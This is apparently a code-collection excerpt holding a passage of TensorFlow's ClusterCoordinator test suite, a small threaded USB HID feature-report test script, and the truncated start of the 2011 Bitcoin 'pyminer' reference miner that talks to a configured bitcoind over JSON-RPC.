class ClusterCoordinatorTest(TestCaseWithErrorReportingThread,
parameterized.TestCase):
@classmethod
def setUpClass(cls):
super(ClusterCoordinatorTest, cls).setUpClass()
cls.coordinator = make_coordinator(num_workers=5, num_ps=2)
cls.strategy = cls.coordinator.strategy
def testClusterCoordinatorOnlyInitOnce(self):
cluster = self.coordinator._cluster
same_coordinator = coordinator_lib.ClusterCoordinator(self.strategy)
self.assertIs(self.coordinator, same_coordinator)
self.assertIs(cluster, same_coordinator._cluster)
def testFnReturnNestedValues(self):
x = constant_op.constant(1)
@def_function.function
def f():
return x + 1, (x + 2, x + 3), [x + 4], {'v': x}
got = self.coordinator.schedule(f)
want = 2, (3, 4), [5], {'v': 1}
self.assertEqual(got.fetch(), want)
self.assertEqual(self.coordinator.fetch(got), want)
def testFetchingRemoteValueStructure(self):
self.skipTest('b/171040359: flaky test')
x = constant_op.constant(1)
@def_function.function
def f():
return x + 1, (x + 2, x + 3), [x + 4], {'v': x}
want = 2, (3, 4), [5], {'v': 1}
remote_value_list = [self.coordinator.schedule(f) for _ in range(5)]
self.assertAllEqual(
self.coordinator.fetch(remote_value_list), [want for _ in range(5)])
def testInputFunction(self):
def input_fn():
return dataset_ops.DatasetV2.range(1, 2)
with self.strategy.scope():
v = variables.Variable(initial_value=0, dtype=dtypes.int64)
@def_function.function
def worker_fn(iterator):
x = next(iterator)
v.assign_add(x)
return x
distributed_dataset = self.coordinator.create_per_worker_dataset(input_fn)
result = self.coordinator.schedule(
worker_fn, args=(iter(distributed_dataset),))
result = self.coordinator.fetch(result)
self.assertEqual(result, (1,))
result = self.coordinator.schedule(
worker_fn, args=(iter(distributed_dataset),))
result = self.coordinator.fetch(result)
self.assertEqual(result, (1,))
self.assertAlmostEqual(v.read_value(), 2, delta=1e-6)
def testAsyncScheduleAndJoin(self):
if test_util.is_xla_enabled():
self.skipTest('Assign_add is not deterministic across threads in XLA')
def input_fn():
return dataset_ops.DatasetV2.from_tensor_slices([2] * 10)
with self.strategy.scope():
v = variables.Variable(initial_value=0, dtype=dtypes.int32)
# TODO(yuefengz): the following tf.function has a return value which is None
# in its structured_outputs.
@def_function.function
def worker_fn(iterator):
x = next(iterator)
v.assign_add(x)
distributed_dataset = self.coordinator.create_per_worker_dataset(input_fn)
iterator = iter(distributed_dataset)
# Verifying joining without any scheduling doesn't hang.
self.coordinator.join()
self.assertEqual(v.read_value().numpy(), 0)
for _ in range(5):
self.coordinator.schedule(worker_fn, args=(iterator,))
self.coordinator.join()
# With 5 addition it should be 2*5 = 10.
self.assertEqual(v.read_value().numpy(), 10)
for _ in range(5):
self.coordinator.schedule(worker_fn, args=(iterator,))
# Verifying multiple join is fine.
self.coordinator.join()
self.coordinator.join()
self.coordinator.join()
self.assertTrue(self.coordinator.done())
# Likewise, it's now 20.
self.assertEqual(v.read_value().numpy(), 20.)
@parameterized.parameters(True, False)
def testInputFunctionWithMap(self, use_input_fn):
self._map_fn_tracing_count = 0
def input_fn():
def map_fn(x):
self._map_fn_tracing_count += 1
return x + 10
return dataset_ops.DatasetV2.range(0, 10).map(map_fn)
@def_function.function
def worker_fn(iterator):
return next(iterator)
if use_input_fn:
distributed_dataset = self.coordinator.create_per_worker_dataset(input_fn)
else:
distributed_dataset = self.coordinator.create_per_worker_dataset(
input_fn())
result = self.coordinator.schedule(
worker_fn, args=(iter(distributed_dataset),))
self.assertEqual(result.fetch(), (10,))
self.assertEqual(self._map_fn_tracing_count, 1)
def testInputFunctionCreateVariables(self):
def input_fn():
v = variables.Variable(initial_value=0.0)
return v.read_value()
with self.assertRaises(ValueError):
self.coordinator.create_per_worker_dataset(input_fn)
@parameterized.parameters(True, False)
def testDatasetsShuffledDifferently(self, use_input_fn):
# This test requires at least two workers in the cluster.
self.assertGreaterEqual(len(self.coordinator._cluster.workers), 2)
random_seed.set_random_seed(None)
def input_fn():
dataset = dataset_ops.DatasetV2.range(0, 100).shuffle(100).batch(1)
return self.strategy.experimental_distribute_dataset(dataset)
if use_input_fn:
distributed_dataset = self.coordinator.create_per_worker_dataset(input_fn)
else:
distributed_dataset = self.coordinator.create_per_worker_dataset(
input_fn())
distributed_iterator = iter(distributed_dataset)
# Get elements from the first two iterators.
iterator_1 = distributed_iterator._values[0]
iterator_1._rebuild_on(self.coordinator._cluster.workers[0])
iterator_1 = iterator_1.fetch()
elements_in_iterator_1 = [
self.strategy.experimental_local_results(e)
for e in iterator_1
]
iterator_2 = distributed_iterator._values[1]
iterator_2._rebuild_on(self.coordinator._cluster.workers[1])
iterator_2 = iterator_2.fetch()
elements_in_iterator_2 = [
self.strategy.experimental_local_results(e)
for e in iterator_2
]
self.assertNotAllEqual(elements_in_iterator_1, elements_in_iterator_2)
def testPerWorkerValue(self):
self.skipTest('b/168569314')
var_shape = tuple()
var_dtype = dtypes.float32
var_name = 'var'
def create_var():
var = variables.Variable(
initial_value=0.0, dtype=var_dtype, name=var_name)
self.assertIn('worker', var.device)
return var
worker_local_var = self.coordinator._create_per_worker_resources(create_var)
# The following is a workaround to allow `worker_local_var` to be passed in
# as args to the `coordinator.schedule` method which requires tensor specs
# to trace tf.function but _create_worker_resources' return values don't
# have tensor specs. We can get rid of this workaround once
# _create_worker_resources is able to infer the tensor spec of the return
# value of the function passed in. See b/154675763.
for var in worker_local_var._values:
var._type_spec = tensor_spec.TensorSpec(var_shape, var_dtype, var_name)
def worker_fn(var):
var.assign_add(1.0)
for _ in range(10):
# Which slice of `worker_local_var` will be used will depend on which
# worker the `worker_fn` gets scheduled on.
self.coordinator.schedule(worker_fn, args=(worker_local_var,))
self.coordinator.join()
var_sum = sum(self.coordinator.fetch(worker_local_var._values))
self.assertEqual(var_sum, 10.0)
def testDisallowRemoteValueAsInput(self):
@def_function.function
def func_0():
return 1.0
@def_function.function
def func_1(x):
return x + 1.0
remote_v = self.coordinator.schedule(func_0)
with self.assertRaises(ValueError):
self.coordinator.schedule(func_1, args=(remote_v,))
def testPythonFunctionNotAllowedToSchedule(self):
def func(a):
return array_ops.identity(a)
with self.assertRaisesRegexp(
TypeError,
'`tf.distribute.experimental.coordinator.ClusterCoordinator.schedule` '
'only accepts a `tf.function` or a concrete function.'):
self.coordinator.schedule(func, args=(1,))
def testDatasetPartiallyCreatedOnCoordinator(self):
dataset = dataset_ops.DatasetV2.range(1, 10)
@def_function.function
def input_fn():
return dataset.shuffle(9)
@def_function.function
def worker_fn(iterator):
x = next(iterator)
return x
per_worker_dataset = self.coordinator.create_per_worker_dataset(input_fn)
self.coordinator.schedule(worker_fn, args=(iter(per_worker_dataset),))
with self.assertRaisesRegexp(
coordinator_lib.InputError,
'error message is Failed copying input tensor from'):
self.coordinator.join()
def testPassDatasetToCreatePerWorkerDataset(self):
dataset = dataset_ops.DatasetV2.range(1, 11).batch(4)
@def_function.function
def worker_fn(iterator):
return next(iterator)
per_worker_dataset = self.coordinator.create_per_worker_dataset(dataset)
result = self.coordinator.schedule(
worker_fn, args=(iter(per_worker_dataset),))
result = result.fetch()
expected_result = math_ops.range(1., 5.)
self.assertAllEqual(result, (expected_result))
def testMultipleDatasets(self):
def input_fn1():
return dataset_ops.DatasetV2.range(0, 5)
def input_fn2():
return dataset_ops.DatasetV2.range(5, 10)
per_worker_dataset1 = self.coordinator.create_per_worker_dataset(input_fn1)
per_worker_iterator1 = iter(per_worker_dataset1)
per_worker_dataset2 = self.coordinator.create_per_worker_dataset(input_fn2)
per_worker_iterator2 = iter(per_worker_dataset2)
@def_function.function
def worker_fn(iterator1, iterator2):
return next(iterator1) + next(iterator2)
result = self.coordinator.schedule(
worker_fn, args=(per_worker_iterator1, per_worker_iterator2))
self.assertEqual(result.fetch(), 5.0)
per_worker_dataset3 = self.coordinator.create_per_worker_dataset(input_fn1)
per_worker_iterator3 = iter(per_worker_dataset3)
result = self.coordinator.schedule(
worker_fn, args=(per_worker_iterator3, per_worker_iterator2))
self.assertGreaterEqual(result.fetch(), 5.0)
def testRepeatedIteratorCreation(self):
def input_fn():
return dataset_ops.DatasetV2.range(1, 100)
per_worker_dataset1 = self.coordinator.create_per_worker_dataset(input_fn)
per_worker_dataset2 = self.coordinator.create_per_worker_dataset(input_fn)
@def_function.function
def worker_fn(iterator1, iterator2):
return next(iterator1) + next(iterator2)
for _ in range(10):
per_worker_iterator1 = iter(per_worker_dataset1)
per_worker_iterator2 = iter(per_worker_dataset2)
result = self.coordinator.schedule(
worker_fn, args=(per_worker_iterator1, per_worker_iterator2))
for _ in range(10):
self.coordinator.schedule(
worker_fn, args=(per_worker_iterator1, per_worker_iterator2))
self.coordinator.join()
self.assertGreaterEqual(result.fetch(), 2.0)
del per_worker_iterator1, per_worker_iterator2
gc.collect()
# There shouldn't be any live iterator objects.
for w in self.coordinator._cluster.workers:
for r in w._resource_remote_value_refs:
self.assertIsNone(r())
class LimitedClosureQueueSizeBasicTest(ClusterCoordinatorTest):
"""Test basic functionality works with explicit maximum closure queue size.
Execute the same set of test cases as in `ClusterCoordinatorTest`, with an
explicit size limit for the closure queue. Note that even when the queue size
is set to infinite, there is still a maximum practical size (depends on host
memory limit) that might cause the queue.put operations to be blocking when
scheduling a large number of closures on a big cluster. These tests make sure
that the coordinator does not run into deadlocks in such scenario.
"""
@classmethod
def setUpClass(cls):
super(LimitedClosureQueueSizeBasicTest, cls).setUpClass()
coordinator_lib._CLOSURE_QUEUE_MAX_SIZE = 2
cls.coordinator = make_coordinator(num_workers=5, num_ps=2)
cls.strategy = cls.coordinator.strategy
class ScheduleStartDelayTest(ClusterCoordinatorTest):
"""Test basic functionality works with worker scheduling delay.
This is basically to make sure that setting environment variables
`TF_COORDINATOR_SCHEDULE_START_DELAY` and
`TF_COORDINATOR_SCHEDULE_START_DELAY_MAX` will cause any failure.
"""
@classmethod
def setUpClass(cls):
super(ScheduleStartDelayTest, cls).setUpClass()
os.environ['TF_COORDINATOR_SCHEDULE_START_DELAY'] = '2'
os.environ['TF_COORDINATOR_SCHEDULE_START_DELAY_MAX'] = '4'
cls.coordinator = make_coordinator(num_workers=3, num_ps=2)
cls.strategy = cls.coordinator.strategy
@classmethod
def tearDownClass(cls):
del os.environ['TF_COORDINATOR_SCHEDULE_START_DELAY']
del os.environ['TF_COORDINATOR_SCHEDULE_START_DELAY_MAX']
super(ScheduleStartDelayTest, cls).tearDownClass()
class ErrorReportingTest(TestCaseWithErrorReportingThread):
@classmethod
def setUpClass(cls):
super(ErrorReportingTest, cls).setUpClass()
cls.coordinator = make_coordinator(num_workers=3, num_ps=2)
cls.strategy = cls.coordinator.strategy
with cls.strategy.scope():
cls.iteration = variables.Variable(initial_value=0.0)
@def_function.function
def _normal_function(self):
x = random_ops.random_uniform((2, 10))
y = random_ops.random_uniform((10, 2))
self.iteration.assign_add(1.0)
return math_ops.reduce_mean(math_ops.matmul(x, y))
@def_function.function
def _error_function(self):
x = random_ops.random_uniform((2, 10))
y = random_ops.random_uniform((10, 2))
check_ops.assert_non_positive_v2(math_ops.reduce_sum(math_ops.matmul(x, y)))
self.iteration.assign_add(1.0)
return self.iteration
@def_function.function
def _long_function(self):
x = random_ops.random_uniform((1000, 1000))
for _ in math_ops.range(10000):
a = random_ops.random_uniform((1000, 1000))
b = random_ops.random_uniform((1000, 1000))
x += math_ops.matmul(a, b)
return x
def testJoinRaiseError(self):
for _ in range(3):
self.coordinator.schedule(self._normal_function)
self.coordinator.schedule(self._error_function)
with self.assertRaises(errors.InvalidArgumentError):
self.coordinator.join()
def testScheduleRaiseError(self):
for _ in range(3):
self.coordinator.schedule(self._normal_function)
self.coordinator.schedule(self._error_function)
with self.assertRaises(errors.InvalidArgumentError):
while True:
self.coordinator.schedule(self._normal_function)
def testScheduleRaiseErrorWithMultipleFailure(self):
for _ in range(3):
self.coordinator.schedule(self._normal_function)
self.coordinator.schedule(self._error_function)
with self.assertRaises(errors.InvalidArgumentError):
while True:
self.coordinator.schedule(self._error_function)
self.coordinator.join()
def testErrorWillbeCleared(self):
self.coordinator.schedule(self._error_function)
with self.assertRaises(errors.InvalidArgumentError):
self.coordinator.join()
for _ in range(3):
self.coordinator.schedule(self._normal_function)
self.coordinator.schedule(self._error_function)
with self.assertRaises(errors.InvalidArgumentError):
self.coordinator.join()
def testRemoteValueReturnError(self):
self.skipTest('TODO(b/211502459): Fix this in OSS test.')
result = self.coordinator.schedule(self._error_function)
with self.assertRaises(errors.InvalidArgumentError):
result.fetch()
# Clear the error.
with self.assertRaises(errors.InvalidArgumentError):
self.coordinator.join()
def testInputError(self):
worker_local_val = self.coordinator._create_per_worker_resources(
self._error_function)
@def_function.function
def func(x):
return x + 1
result = self.coordinator.schedule(func, args=(worker_local_val,))
with self.assertRaises(coordinator_lib.InputError):
self.coordinator.join()
with self.assertRaises(coordinator_lib.InputError):
result.fetch()
def testCancellation(self):
for _ in range(3):
self.coordinator.schedule(self._normal_function)
long_function = self.coordinator.schedule(self._long_function)
self.coordinator.schedule(self._error_function)
with self.assertRaises(errors.InvalidArgumentError):
self.coordinator.join()
with self.assertRaises(errors.CancelledError):
long_function.fetch()
for _ in range(3):
self.coordinator.schedule(self._normal_function)
self.coordinator.join()
class LimitedClosureQueueErrorTest(ErrorReportingTest):
"""Test error reporting works with explicit maximum closure queue size.
Execute the same set of test cases as in ErrorReportingTest, with an explicit
size limit for the closure queue.
"""
@classmethod
def setUpClass(cls):
super(LimitedClosureQueueErrorTest, cls).setUpClass()
coordinator_lib._CLOSURE_QUEUE_MAX_SIZE = 2
cls.coordinator = make_coordinator(num_workers=3, num_ps=2)
cls.strategy = cls.coordinator.strategy
with cls.coordinator.strategy.scope():
cls.iteration = variables.Variable(initial_value=0.0)
class StrategyIntegrationTest(test.TestCase, parameterized.TestCase):
@classmethod
def setUpClass(cls):
super(StrategyIntegrationTest, cls).setUpClass()
cls.coordinator = make_coordinator(num_workers=1, num_ps=1)
cls.strategy = cls.coordinator.strategy
def testRunNotUsedWithClusterCoordinatorSchedule(self):
@def_function.function
def input_fn():
return dataset_ops.DatasetV2.range(1, 3)
with self.strategy.scope():
v = variables.Variable(initial_value=1, dtype=dtypes.int64)
def replica_fn(input_tensor):
return input_tensor + v, input_tensor - v
@def_function.function
def worker_fn(iterator):
return self.strategy.run(replica_fn, args=(next(iterator),))
per_worker_dataset = self.coordinator.create_per_worker_dataset(input_fn)
@contextlib.contextmanager
def _assert_logs_usage_warning():
with self.assertLogs(level='WARNING') as logs:
yield
self.assertIn(
'A `tf.distribute.experimental.ParameterServerStrategy` method is '
'invoked without using `ClusterCoordinator.schedule`. If you are not '
'tracing a tf.function, this method is possibly executed on the '
'coordinator, which can be slow. To properly dispatch functions to '
'run on workers, methods like `run` or `reduce` should be used '
'within a function passed to `tf.distribute.experimental.coordinator.'
'ClusterCoordinator.schedule`.', logs.output[0])
with _assert_logs_usage_warning():
# Invoking `run` without `coordinator.schedule` should result in a
# warning.
self.strategy.run(
replica_fn, args=(constant_op.constant(1, dtype=dtypes.int64),))
# A proper `schedule` should succeed.
rv = self.coordinator.schedule(worker_fn, args=(iter(per_worker_dataset),))
with _assert_logs_usage_warning():
# Invoking `run` without `coordinator.schedule` again should result in a
# warning.
self.strategy.run(
replica_fn, args=(constant_op.constant(1, dtype=dtypes.int64),))
all_results = [(2, 0)] * self.strategy.num_replicas_in_sync
expected_result = []
for i in range(self.strategy.num_replicas_in_sync):
expected_result.append(all_results[i])
self.assertAllEqual(
tuple(expected_result),
self.strategy.experimental_local_results(rv.fetch()))
def testBasicVariableAssignment(self):
self.strategy.extended._variable_count = 0
with self.strategy.scope():
v1 = variables.Variable(initial_value=0.0)
v2 = variables.Variable(initial_value=1.0)
self.assertEqual(self.strategy.extended._variable_count, 2)
@def_function.function
def worker_fn():
v1.assign_add(0.1)
v2.assign_sub(0.2)
return v1.read_value() / v2.read_value()
results = self.coordinator.schedule(worker_fn)
logging.info('Results of experimental_run_v2: %f',
self.coordinator.fetch(results))
self.assertAlmostEqual(v1.read_value().numpy(), 0.1, delta=1e-6)
self.assertAlmostEqual(v2.read_value().numpy(), 0.8, delta=1e-6)
def testRunAndReduce(self):
self.assertFalse(distribution_strategy_context.in_cross_replica_context())
with self.strategy.scope():
self.assertTrue(distribution_strategy_context.in_cross_replica_context())
v = variables.Variable(initial_value=1.)
expected_result = (4. * self.strategy.num_replicas_in_sync,
2. * self.strategy.num_replicas_in_sync)
@def_function.function
def worker_fn(input_tensor):
def replica_fn(input_tensor):
# Within `replica_fn`, it has to be in a replica context.
self.assertFalse(
distribution_strategy_context.in_cross_replica_context())
return input_tensor + v, input_tensor - v
run_result = self.strategy.run(replica_fn, args=(input_tensor,))
reduced_result = self.strategy.reduce('SUM', run_result, axis=None)
check_ops.assert_equal_v2(reduced_result, expected_result)
return reduced_result
# Asserting scheduling in scope has the expected behavior.
result = self.coordinator.schedule(
worker_fn, args=(constant_op.constant(3.),))
self.assertIsInstance(result, coordinator_lib.RemoteValue)
self.assertEqual(result.fetch(), expected_result)
# Asserting scheduling out of scope has the expected behavior.
result = self.coordinator.schedule(
worker_fn, args=(constant_op.constant(3.),))
self.assertEqual(result.fetch(), expected_result)
def testRunAndReduceWithAssignAdd(self):
self.assertFalse(distribution_strategy_context.in_cross_replica_context())
with self.strategy.scope():
self.assertTrue(distribution_strategy_context.in_cross_replica_context())
v = variables.Variable(initial_value=1.)
v1 = variables.Variable(
initial_value=0.,
aggregation=variable_scope.VariableAggregation.ONLY_FIRST_REPLICA)
expected_result = (4. * self.strategy.num_replicas_in_sync,
2. * self.strategy.num_replicas_in_sync)
@def_function.function
def worker_fn(input_tensor):
def replica_fn(input_tensor):
# Within `replica_fn`, it has to be in a replica context.
self.assertFalse(
distribution_strategy_context.in_cross_replica_context())
v1.assign_add(input_tensor)
return input_tensor + v, input_tensor - v
run_result = self.strategy.run(replica_fn, args=(input_tensor,))
reduced_result = self.strategy.reduce('SUM', run_result, axis=None)
check_ops.assert_equal_v2(reduced_result, expected_result)
return reduced_result
# Asserting scheduling in scope has the expected behavior.
result = self.coordinator.schedule(
worker_fn, args=(constant_op.constant(3.),))
self.assertIsInstance(result, coordinator_lib.RemoteValue)
self.assertEqual(result.fetch(), expected_result)
# Asserting scheduling out of scope has the expected behavior.
result = self.coordinator.schedule(
worker_fn, args=(constant_op.constant(3.),))
self.assertEqual(result.fetch(), expected_result)
self.assertEqual(v1, 6.)
def testVariableAggregation(self):
self.assertFalse(distribution_strategy_context.in_cross_replica_context())
with self.strategy.scope():
self.assertTrue(distribution_strategy_context.in_cross_replica_context())
v = variables.Variable(
initial_value=1.,
aggregation=variable_scope.VariableAggregation.SUM)
@def_function.function
def worker_fn():
def replica_fn():
value = math_ops.cast(
distribution_strategy_context.get_replica_context()
.replica_id_in_sync_group + 1, v.dtype)
v.assign(value)
self.strategy.run(replica_fn)
self.coordinator.schedule(worker_fn)
self.coordinator.join()
expected_result = 0.
for i in range(self.strategy.num_replicas_in_sync):
expected_result = expected_result + i + 1
self.assertEqual(v, expected_result)
def testVariableCaching(self):
self.assertFalse(distribution_strategy_context.in_cross_replica_context())
with self.strategy.scope():
self.assertTrue(distribution_strategy_context.in_cross_replica_context())
v = variables.Variable(
initial_value=1.,
aggregation=variable_scope.VariableAggregation.ONLY_FIRST_REPLICA)
# Test read value inside caching scope
with distribute_utils.cache_variable_reads():
v.read_value() # Reads value 1.0
v.assign(constant_op.constant(5.0)) # v changes to 5.0
self.assertEqual(v.read_value(), 1.0) # should be cached 1.0 value.
# Reset v to 2.0
v.assign(2.0)
# Test convert to tensor value inside caching scope
with distribute_utils.cache_variable_reads():
t = v * 3.0
self.assertEqual(t, 6.0)
v.assign(3.0)
t1 = v * 3.0
self.assertEqual(t1, 6.0) # should be cached 2.0 * 3.0 value.
# Reset v to 1.0
v.assign(1.0)
# Verify caching scope inside tf.function
@def_function.function
def worker_fn():
with distribute_utils.cache_variable_reads():
def replica_fn():
t = v.read_value() # Reads value 1.0
v.assign(constant_op.constant(5.0)) # v changes to 5.0
t = v.read_value() # should return 1.0
return t # Should be 1.0 instead of 5.0
return self.strategy.run(replica_fn)
result = self.coordinator.schedule(worker_fn)
result = result.fetch()
expected_result = 1.
self.assertEqual(result, expected_result)
# Verify that v.read_value works as expected outside of scope.
v.assign(4.0)
self.assertEqual(v.read_value(), 4.0)
v.assign(constant_op.constant(2.0)) # v changes to 2.0
# Check with scope outside of tf function and check that cache is reset
@def_function.function
def worker_fn1():
def replica_fn():
t = v.read_value() # Reads value 2.0 ==> Should be cached
v.assign(constant_op.constant(5.0)) # v changes to 5.0
t = v.read_value() # should return cached value 2.0
return t # Should be 2.0 instead of 5.0
return self.strategy.run(replica_fn)
with distribute_utils.cache_variable_reads():
result = self.coordinator.schedule(worker_fn1)
result = result.fetch()
expected_result = 2.
self.assertEqual(result, expected_result)
# Verify scope nesting is not permitted.
with self.assertRaises(ValueError):
with distribute_utils.cache_variable_reads():
with distribute_utils.cache_variable_reads():
v.read_value()
@parameterized.parameters(True, False)
def testDistributedDatasetInsidePerWorkerDatasetFn(self, from_function):
if from_function:
def per_worker_dataset_fn():
dataset_fn = lambda _: dataset_ops.DatasetV2.range(1, 11).batch(4)
return self.strategy.distribute_datasets_from_function(dataset_fn)
else:
def per_worker_dataset_fn():
dataset = dataset_ops.DatasetV2.range(1, 11).batch(4)
return self.strategy.experimental_distribute_dataset(dataset)
@def_function.function
def worker_fn(iterator):
return self.strategy.experimental_local_results(next(iterator))
per_worker_dataset = self.coordinator.create_per_worker_dataset(
per_worker_dataset_fn)
result = self.coordinator.schedule(
worker_fn, args=(iter(per_worker_dataset),))
result = result.fetch()
expected_result = array_ops.split(
math_ops.range(1., 5.),
num_or_size_splits=self.strategy.num_replicas_in_sync,
axis=0)
self.assertAllEqual(result, (expected_result))
@parameterized.parameters(True, False)
def testPassDistributedDatasetToCreatePerWorkerDataset(self, from_function):
if from_function:
dataset_fn = lambda _: dataset_ops.DatasetV2.range(1, 11).batch(4)
distributed_dataset = self.strategy.distribute_datasets_from_function(
dataset_fn)
else:
dataset = dataset_ops.DatasetV2.range(1, 11).batch(4)
distributed_dataset = self.strategy.experimental_distribute_dataset(
dataset)
@def_function.function
def worker_fn(iterator):
return self.strategy.experimental_local_results(next(iterator))
per_worker_dataset = self.coordinator.create_per_worker_dataset(
distributed_dataset)
result = self.coordinator.schedule(
worker_fn, args=(iter(per_worker_dataset),))
result = result.fetch()
expected_result = array_ops.split(
math_ops.range(1., 5.),
num_or_size_splits=self.strategy.num_replicas_in_sync,
axis=0)
self.assertAllEqual(result, (expected_result))
def testDistributeDatasetsFromFunction(self):
def per_worker_dataset_fn():
def input_worker_device_fn(input_context):
self.assertIsNotNone(input_context)
return dataset_ops.DatasetV2.range(1, 11).batch(1)
return self.strategy.distribute_datasets_from_function(
input_worker_device_fn)
@def_function.function
def worker_fn(iterator):
result = self.strategy.experimental_local_results(next(iterator))
return result
distributed_dataset = self.coordinator.create_per_worker_dataset(
per_worker_dataset_fn)
result = self.coordinator.schedule(
worker_fn, args=(iter(distributed_dataset),))
result = result.fetch()
expected_result = []
for i in range(self.strategy.num_replicas_in_sync):
expected_result.append([1 + i])
self.assertAllEqual(result, expected_result)
def testAsyncScheduleWithDistributedDataset(self):
def input_fn():
dataset = dataset_ops.DatasetV2.from_tensor_slices([2.]).repeat().batch(
self.strategy.num_replicas_in_sync)
return self.strategy.experimental_distribute_dataset(dataset)
with self.strategy.scope():
v = variables.Variable(initial_value=[0], dtype=dtypes.float32)
# TODO(yuefengz): the following tf.function has a return value which is None
# in its structured_outputs.
@def_function.function
def worker_fn(iterator):
x = next(iterator)
# Reduce to convert PerReplica values to single value
reduced_value = self.strategy.reduce('MEAN', x, axis=None)
v.assign_add(reduced_value)
distributed_dataset = self.coordinator.create_per_worker_dataset(input_fn)
iterator = iter(distributed_dataset)
# Verifying joining without any scheduling doesn't hang.
self.coordinator.join()
self.assertAllEqual(v.read_value(), (0,))
for _ in range(5):
self.coordinator.schedule(worker_fn, args=(iterator,))
self.coordinator.join()
# With 5 addition it should be 2*5 = 10.
self.assertAllEqual(
self.strategy.experimental_local_results(v.read_value()), ([[10]]))
for _ in range(5):
self.coordinator.schedule(worker_fn, args=(iterator,))
# Verifying multiple join is fine.
self.coordinator.join()
self.coordinator.join()
self.coordinator.join()
self.assertTrue(self.coordinator.done())
# Likewise, it's now 20.
self.assertAllEqual(
self.strategy.experimental_local_results(v.read_value()), ([[20]]))
def testInputFunctionWithMapWithDistributedDataset(self):
self._map_fn_tracing_count = 0
def input_fn():
def map_fn(x):
self._map_fn_tracing_count += 1
return x + 10
dataset = dataset_ops.DatasetV2.range(0, 10).batch(
self.strategy.num_replicas_in_sync).map(map_fn)
return self.strategy.experimental_distribute_dataset(dataset)
@def_function.function
def worker_fn(iterator):
return next(iterator)
distributed_dataset = self.coordinator.create_per_worker_dataset(input_fn)
result = self.coordinator.schedule(
worker_fn, args=(iter(distributed_dataset),))
expected_result = array_ops.split(
math_ops.range(10., 10. + self.strategy.num_replicas_in_sync),
num_or_size_splits=self.strategy.num_replicas_in_sync,
axis=0)
self.assertAllEqual(
self.strategy.experimental_local_results(result.fetch()),
tuple(expected_result))
self.assertEqual(self._map_fn_tracing_count, 1)
def testPerWorkerDistributeDatasetsElementSpec(self):
def per_worker_dataset_fn():
return self.strategy.distribute_datasets_from_function(
lambda _: dataset_ops.DatasetV2.from_tensor_slices([1, 2]))
dataset = dataset_ops.DatasetV2.from_tensor_slices([1, 2])
per_worker_distribute_dataset = self.coordinator.create_per_worker_dataset(
per_worker_dataset_fn)
self.assertAllEqual(
# Converts to PerReplicaSpec when num_replicas_in_sync are > 1
input_lib._create_distributed_tensor_spec(self.strategy,
dataset.element_spec),
per_worker_distribute_dataset.element_spec)
def testPerWorkerDistributedIteratorTypeSpec(self):
self._tracing_count = 0
def per_worker_dataset_fn():
self._tracing_count += 1
return self.strategy.distribute_datasets_from_function(
lambda _: dataset_ops.DatasetV2.range(1, 2))
@def_function.function
def worker_fn(iterator):
return next(iterator)
distributed_iterator = iter(
self.coordinator.create_per_worker_dataset(per_worker_dataset_fn))
worker_fn.get_concrete_function(distributed_iterator)
self.coordinator.schedule(worker_fn, args=(distributed_iterator,))
self.assertEqual(self._tracing_count, 1)
if __name__ == '__main__':
v2_compat.enable_v2_behavior()
test.main()
|
usbhid_test.py
|
from usbhid import usbhid
import sys
import threading
import time
import random
hid = usbhid()
ret = hid.open(0x084B,0x4853)
if ret != True:
sys.exit(-1)
# hid.disp_info()
# hid.set_debug_level(1)
# hid.
def hid_write(data):
block_size = 64
total_length = len(data)
offset = 0
length = total_length
__data = [0] * 64
while length > block_size:
__data[0:block_size] = data[offset:offset + block_size]
hid.setfeature(__data)
length -= block_size
offset += block_size
__data = [0] * 64
if length != 0:
__data[0:0+length] = data[offset:offset + length]
hid.setfeature(__data)
def hid_read():
data = []
for i in range(5):
__data = hid.getfeature(64)
data.extend(__data)
return data
# -------------------------------------------
def disp_hid_info():
print("thread %s is start" % threading.current_thread().name)
while True:
print('')
hid.disp_info()
delay_ms = random.uniform(0,5.0)
print('延时{0:0.2f}s再插入下一条命令'.format(delay_ms))
time.sleep(delay_ms)
# break
print("thread %s is end" % threading.current_thread().name)
# --------------
def feature_test():
print("thread %s is start" % threading.current_thread().name)
data = []
for i in range(292):
data.append(i)
while True:
print('.',end='',flush=True)
hid_write(data)
hid_read()
# break
print("thread %s is end" % threading.current_thread().name)
# -------------------------------------------
print("thread %s is start" % threading.current_thread().name)
t1 = threading.Thread(target=disp_hid_info, name='disp_hid_info')
t2 = threading.Thread(target=feature_test, name='feature_test')
t1.start()
t2.start()
t1.join()
t2.join()
print("thread %s is end" % threading.current_thread().name)
|
pyminer.py
|
#!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
